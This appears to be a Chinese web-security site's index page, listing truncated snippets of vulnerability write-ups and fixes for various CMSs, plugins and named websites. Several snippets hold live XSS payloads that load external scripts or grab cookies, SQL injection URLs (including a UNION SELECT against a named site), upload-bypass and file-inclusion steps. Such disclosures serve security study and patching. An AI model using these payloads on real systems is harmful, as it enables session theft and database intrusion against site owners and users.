Breaking javascript/html comments - 网站安全 - 自学php关注热度:23
Author:@Sogili这只是个简单的笔记.如果你也有更多的想法,欢迎提出.1.JavascriptIE:script/*@cc_on!alert(1)//*//script利用IE的条件编译机制突破, about @cc_on statment,一般用于做hack.Chrome:script.....[详情]
Mass username brute force attacks - 网站安全 - 自学php关注热度:25
网站的账号登陆安全是一个大的体系,个人研究也不深,只是随便说说。传统的黑客是针对单个账户生成密码字典进行暴力破解,大家都知道这个游戏规则,下面我就说点别的:举个例子..[详情]
WordPress插件IP-Logger<= 3.0 SQL注射缺陷及修复 - 网关注热度:43
# Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)# 下载地址: http://downloads.wordpr.....[详情]
Ecmall全版本本地文件包含漏洞及修复(REQUEST内容缺关注热度:36
编外:以前的一个:http://www.2cto.com/Article/200903/36736.html路人甲简要描述:Ecmall的默认处理中犯了一个严重的错误,绕开了系统中的保护逻辑从而导致可以包含任意文件以php代码执行详细..[详情]
最土团购的一些漏洞及修复 - 网站安全 - 自学p关注热度:19
东西压了一年了 现在很多人都有了看看就好了。。第一个是上传漏洞 此漏洞在6月份出的新版本中已经得到修复最土自己写了upload_image上传函数 本身挺安全的但是upload.php没有用这个函数..[详情]
百姓网xss及修复 - 网站安全 - 自学php关注热度:18
简要描述:query参数对用户输入没有过滤就直接返回在页面上。详细说明:tdinput type=text name=query class=input value=#39;scripta=document.cookie;alert(a);/script //td漏洞证明.....[详情]
awiki 20100125多重本地文件包含缺陷及修复 - 网站安关注热度:13
下载地址:http://www.kobaonline.com/awiki/awiki-20100125.zip orhttp://sourceforge.net/projects/kcwiki/files/awiki/awiki-20100125.zip作者 muuratsalo联系方式 muuratsalo[at]gmail.com测试方法:http.....[详情]
天涯微博系统XSS漏洞及修复方案 - 网站安全 - 自关注热度:17
详细说明:参考如下URLhttp://my.tianya.cn/#app=key_img src=cc onerror=alert(#39;xss#39;)话题参数直接通过key_XXX 传递,并且没有过滤漏洞证明:修复方案:建议使用数字/hash id作为URL传参,也.....[详情]
脚本注入:判断数据库类型 - 网站安全 - 自学p关注热度:58
目前,互联网上动态网页所使用的数据库,最常见的就是Microsoft Access和Microsoft SQL Server了。在判断过动态网页使用的是何种脚本以后,就要判断数据库类型了。这在脚本注入的过程中,..[详情]
我来传授网站WebSite几个防黑经验 - 网站安全 - 自关注热度:16
1 .设置严密权限 上传目录只给写入、读取权限绝对不能给执行权限 每个网站WebSite使用独立用户名和密码权限设置为Guest 命令: net localgroup users myweb /del 设置MSSQL、Apache、MySQL以Guest权限运..[详情]
防御和检查SQL注入攻击的手段 - 网站安全 - 自学关注热度:24
导读:虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施。知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。 观察..[详情]
老文赏:SQL注入思路与手工猜解大进阶 - 网站安关注热度:122
什么叫SQL注入? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常..[详情]
双字节编码绕PHP单引号转义又一例: SQL UPDATE注入关注热度:26
原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》 是一样的。view plaincopy to clipboardprint??php// by redice 2010.10.21// 连接mysql数据库$conn=0;$conn = mysql_connect(localhost.....[详情]
77种XSS跨站脚本攻击总结 - 网站安全 - 自学php关注热度:22
1)普通的XSS JavaScript注入SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT(2)IMG标签XSS使用JavaScript命令SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT(3)IMG标签无分号无引号IMG SRC=javascript:a.....[详情]
网站安全检测报告 - 网站安全 - 自学php关注热度:32
冷锋:有段时间没有发文章了,今天发一篇过时的文章。文章提到漏洞已经修复完毕...========================================================Author:LengF E_Mail:Cn_LgZ#126.comBlog:www.81sec.com www.bh.....[详情]
Contrexx Shopsystem <= 2.2 SP3盲注缺陷及修复 - 网站关注热度:13
Exploit title: Contrexx Shopsystem Blind SQL Injection ExploitExploit PoC: index.php?section=shopproductId=[VALID productid] and [YOUR BLIND SQL CODE]Exploit tested on: Debian .....[详情]
Wordpress网店插件eShop多重xss - 网站安全 - 自学ph关注热度:43
Product: eShop for WordpressVendor: Rich Pedley ( http://wordpress.org/extend/plugins/eshop/ )Vulnerable Version: 6.2.8 and probably priorTested on: 6.2.8Vendor Notification: 20 .....[详情]
巨人某分站存在伪静态注入及修复 - 网站安全关注热度:30
所有数据库漏洞证明:http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(schema_name),9,10,11,@@version,13 from information_schema.sch.....[详情]
华三通信备件管理系统存在SQL 注入漏洞及修复关注热度:21
详细说明:注册页面进行用户名检验的页面,没有对输入进行过滤漏洞证明:http://rma.h3c.com/spms_outter/base/CheckRegistedOrg.do?orgname=admin 返回 帐号:admin 已被注册,请换一个用户名注册!ht..[详情]
Mambo CMS 4.6.x (4.6.5) SQL注射缺陷及修复 - 网站安全关注热度:11
=========================================Mambo CMS 4.6.x (4.6.5) | SQL Injection=========================================1.概述Mambo CMS 4.6.5及更低版本含注射缺陷2. 背景Mambo is a full.....[详情]
videoDB <= 3.1.0 SQL注射缺陷及修复 - 网站安全 -关注热度:14
关键词:allinurl:borrow.php?diskid=关键词:allintitle:videodb# Vendor: http://www.videodb.net/blog/$ -----------#| S3C0VERUN | ------------@along with this i was able in some sites t.....[详情]
syWebEditor上传漏洞的又一利用方法及修复 - 网站安关注热度:14
1,网上流传的syWebEditor上传漏洞,但是还是利用解析漏洞配合才能奏效,但是大部分情况下,我们发现上传的1.asp;2.gif文件,变成了1.asp2.gif,其中;被过滤掉了8 ~9 v- X( z i2 X; Ehttp://www.2c..[详情]
4399缺少过滤导致本地包含漏洞及修复 - 网站安全关注热度:27
简要描述:对上传文件未作判定,可直接上传PHP文件.详细说明:1.上传时表单提交只做了JS验证(FireBUG改下就绕过了)2.上传文件加入GIF头后直接上传为PHP的文件(不知道是否有做mime.type验证..[详情]
腾讯微博反射型XSS漏洞及修复 - 网站安全 - 自学关注热度:22
简要描述:用户点击微博特定内容后,可在当前页面调用外部JS文件。(还没帐号,留个昵称)--by gainover 2011/7/13详细说明:漏洞原因,微博中插入音乐时,未对音乐地址长度及内容做判断..[详情]
Mathew Callingham Associatess(fckeditor) 上传漏洞及修复关注热度:20
漏洞说明: Mathew Callingham Associatess是一款基于PHP+MYSQL的内容管理系统,由于Mathew Callingham Associatess 3.x.x集成了fckeditor编辑器,导致也继承了fckeditor的上传漏洞,另外该系统还存在sql注....[详情]
最新MetInfo企业网站管理系统 V4.0 XSS - 网站安全关注热度:20
发布作者:noevil 漏洞类型:XSS跨站利用方法:在线留言处: 名字填写: NoevilSCRIPT SRC=HTTP://www.2cto.com /xss.js/SCRIPT内容:随意。后台管理员查看留言列表,自动截取Cookie,NoXss会努力的去..[详情]
PHP伪静态与防注入 - 网站安全 - 自学php关注热度:24
PHP伪静态,主要是为了隐藏传递的参数名;于网上搜索后整理伪静态四法?php//伪静态方法一// localhost/php100/test.php?id|1@action|2$Php2Html_FileUrl = $_SERVER[REQUEST_URI];echo $Php2Html_FileUrl.....[详情]
DEDECMS全局变量覆盖漏洞科普关注热度:41
DEDECMS全局变量覆盖漏洞最早是狼族安全小组09年公布的,官方硬撑到现在没修补漏洞,到现在基本上覆盖了DEDECMS全部的版本。个人猜想是不是官方故意留下的后门。下面稍微科普下这个..[详情]
无忧公司系统ASP专业版后台上传漏洞及修复 - 网关注热度:31
作者:脚本小子漏洞文件 后台上传admin/uploadPic.asp漏洞利用 这个漏洞好像是雷池的http://www.2cto.com /admin/uploadPic.asp?actionType=odeditRemNum=scriptkiddies.asp; upload_code=okeditImageNum.....[详情]
flash跨域策略文件crossdomain.xml配置详解 - 网站安全关注热度:36
CnCxzSec衰仔#39;s Blog0x00目录0x01简介0x02 crossdomain.xml的配置0x03总结0x01简介flash在跨域时唯一的限制策略就是crossdomain.xml文件,该文件限制了flash是否可以跨域读写数据以及允许从什么地方跨..[详情]
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com